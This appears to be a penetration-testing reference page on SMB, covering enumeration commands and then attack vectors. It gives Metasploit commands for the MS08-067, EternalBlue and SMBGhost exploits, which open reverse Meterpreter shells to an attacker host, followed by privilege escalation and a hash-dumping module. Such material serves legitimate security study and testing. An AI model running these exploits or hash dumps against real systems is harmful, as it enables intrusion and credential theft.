Skip to main content

SMB (Server Message Block)

Default Port: 139, 445

SMB (Server Message Block), also known as CIFS (Common Internet File System), is a network protocol that allows for file sharing, network browsing, printing services, and inter-process communication over a network.

The SMB protocol provides you with the ability to access resources from a server.

Connect

In order to initiate the process, it's imperative to establish a connection to the Server Message Block (SMB) server.

To list all available shares on the target server, utilize the following command:

smbclient -L //target-ip

Recon

Network Scanning for SMB Services

Identify devices running SMB services within a target network.

# Nmap to discover SMB services
nmap -p 445 --open -sV <target-ip>

Identify SMB Version

Determine which SMB versions are running on target systems.

# Nmap script for SMB version
nmap --script smb-protocols -p 445 <target-ip>

Enumeration

For further enumeration, various tools such as enum4linux, smbmap, or the nmap scripting engine can be employed.

smbclient

Using smbclient to list shares

smbclient -L //192.168.1.100 -U anonymous

enum4linux

Using enum4linux for enumeration

enum4linux -a target-ip

smbmap

smbmap -H target-ip

nmap

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target-ip

This command executes two scripts to enumerate shares and users from the target server.

Attack Vectors

In this section, we will discuss some prevalent attack vectors commonly encountered when dealing with Server Message Block (SMB).

SMB Null Session

A Null Session refers to an unauthenticated connection to an SMB server, providing the capability to gather significant information. Exploitation typically involves SMB connections over TCP ports 445 and 139.

Command to establish a Null Session connection:

rpcclient -U "" <target-ip>

SMB Signing

SMB signing, if not enabled, can be exploited, potentially allowing an attacker to conduct a man-in-the-middle attack.

To check for SMB Signing status:

nmap --script smb-security-mode.nse -p445 <target-ip>

MS08-067 (Netapi)

This vulnerability permits remote attackers to execute arbitrary code through a crafted RPC request.

Metasploit module for exploitation:

use exploit/windows/smb/ms08_067_netapi
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit

MS17-010 (EternalBlue)

This vulnerability enables remote attackers to execute arbitrary code via a crafted SMBv1 request.

Metasploit module for exploitation:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit

SMBGhost (CVE-2020-0796)

Target the SMBGhost vulnerability in SMBv3.

use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit

Post-Exploitation

Following successful exploitation, the post-exploitation phase is initiated, involving deeper investigation.

Gaining System Access

Upon successful exploitation, utilizing the Meterpreter shell facilitates gaining system access.

getsystem

Dumping Hashes

A Metasploit post-module can be employed to dump hashes.

use post/windows/gather/smart_hashdump
exploit

Common SMB Commands

CommandDescriptionUsage
smbclientConnect to an SMB/CIFS serversmbclient //server/share
smbgetDownload files from an SMB/CIFS serversmbget smb://server/share/file
smbpasswdChange a user's SMB passwordsmbpasswd -r server -U username
smbstatusDisplay information about SMB connectionssmbstatus
smbtreeList SMB/CIFS shares on a networksmbtree
mount -t cifsMount an SMB/CIFS sharemount -t cifs //server/share /mnt/point
umountUnmount an SMB/CIFS shareumount /mnt/point